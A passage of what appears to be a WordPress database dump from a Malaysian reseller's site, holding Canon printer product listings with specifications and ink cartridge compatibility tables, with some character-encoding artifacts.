(Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:31:24','2019-09-24 07:31:24','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3291,1,'2019-09-24 15:34:03','2019-09-24 07:34:03','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>Â </p><p>Â </p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>Â </p><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>&lt;center&gt;[maxbutton id=\"11\" ]&lt;/center&gt;</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td 